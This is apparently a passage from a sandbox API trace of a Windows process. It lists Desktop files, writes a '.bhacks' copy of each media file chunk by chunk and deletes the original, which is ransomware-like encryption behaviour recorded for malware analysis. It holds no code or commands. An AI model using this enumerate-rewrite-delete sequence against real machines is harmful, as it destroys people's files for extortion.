ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0065.477] FindClose (in: hFindFile=0x9bed20 | out: hFindFile=0x9bed20) returned 1 [0065.477] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.avi", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.477] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks", lpFilePart=0x0) returned 0x28 [0065.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0065.478] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0065.616] GetFileType (hFile=0x324) returned 0x1 [0065.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0065.616] GetFileType (hFile=0x324) returned 0x1 [0065.698] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi", lpFilePart=0x0) returned 0x21 [0065.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0065.698] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0065.698] GetFileType (hFile=0x33c) returned 0x1 [0065.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0065.698] GetFileType (hFile=0x33c) returned 0x1 [0065.698] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.699] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.699] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.700] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.700] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.700] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.700] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.701] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.701] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.701] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.701] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.702] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.702] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.702] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.702] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.703] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.703] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.703] ReadFile (in: hFile=0x33c, lpBuffer=0x258fb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x258fb78*, lpNumberOfBytesRead=0x6feb68*=0x417, lpOverlapped=0x0) returned 1 [0065.703] WriteFile (in: hFile=0x324, lpBuffer=0x2590d90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2590d90*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.710] ReadFile (in: hFile=0x33c, lpBuffer=0x24b6b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b6b18*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0065.710] CloseHandle (hObject=0x33c) returned 1 [0065.710] WriteFile (in: hFile=0x324, lpBuffer=0x24b7b48*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24b7b48*, lpNumberOfBytesWritten=0x6fea68*=0x420, lpOverlapped=0x0) returned 1 [0065.710] CloseHandle (hObject=0x324) returned 1 [0065.756] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi", lpFilePart=0x0) returned 0x21 [0065.756] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi")) returned 1 [0065.806] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks", lpFilePart=0x0) returned 0x35 [0065.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0065.806] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0065.849] GetFileType (hFile=0x324) returned 0x1 [0065.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0065.850] GetFileType (hFile=0x324) returned 0x1 [0065.932] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi", lpFilePart=0x0) returned 0x2e [0065.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0065.932] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0065.932] GetFileType (hFile=0x33c) returned 0x1 [0065.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0065.932] GetFileType (hFile=0x33c) returned 0x1 [0065.932] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.933] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.933] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.934] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.934] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.934] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.934] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.935] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.935] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.935] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.935] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.936] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.936] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.936] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.936] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.936] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.937] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.937] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.937] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.937] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.937] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.938] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.938] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.938] ReadFile (in: hFile=0x33c, lpBuffer=0x25329c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25329c8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.938] WriteFile (in: hFile=0x324, lpBuffer=0x2533be0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2533be0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.945] ReadFile (in: hFile=0x33c, lpBuffer=0x24b9180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b9180*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.945] WriteFile (in: hFile=0x324, lpBuffer=0x24ba1b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24ba1b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.945] ReadFile (in: hFile=0x33c, lpBuffer=0x24b9180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b9180*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.945] WriteFile (in: hFile=0x324, lpBuffer=0x24ba1b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24ba1b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.946] ReadFile (in: hFile=0x33c, lpBuffer=0x24b9180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b9180*, lpNumberOfBytesRead=0x6feb68*=0xb6b, lpOverlapped=0x0) returned 1 [0065.946] WriteFile (in: hFile=0x324, lpBuffer=0x24ba1b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24ba1b0*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.946] ReadFile (in: hFile=0x33c, lpBuffer=0x24b9180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b9180*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0065.946] CloseHandle (hObject=0x33c) returned 1 [0065.946] WriteFile (in: hFile=0x324, lpBuffer=0x24ba1b0*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24ba1b0*, lpNumberOfBytesWritten=0x6fea68*=0xb70, lpOverlapped=0x0) returned 1 [0065.947] CloseHandle (hObject=0x324) returned 1 [0065.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi", lpFilePart=0x0) returned 0x2e [0065.991] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi")) returned 1 [0066.081] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks", lpFilePart=0x0) returned 0x2e [0066.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.081] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0066.082] GetFileType (hFile=0x324) returned 0x1 [0066.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.082] GetFileType (hFile=0x324) returned 0x1 [0066.238] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi", lpFilePart=0x0) returned 0x27 [0066.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 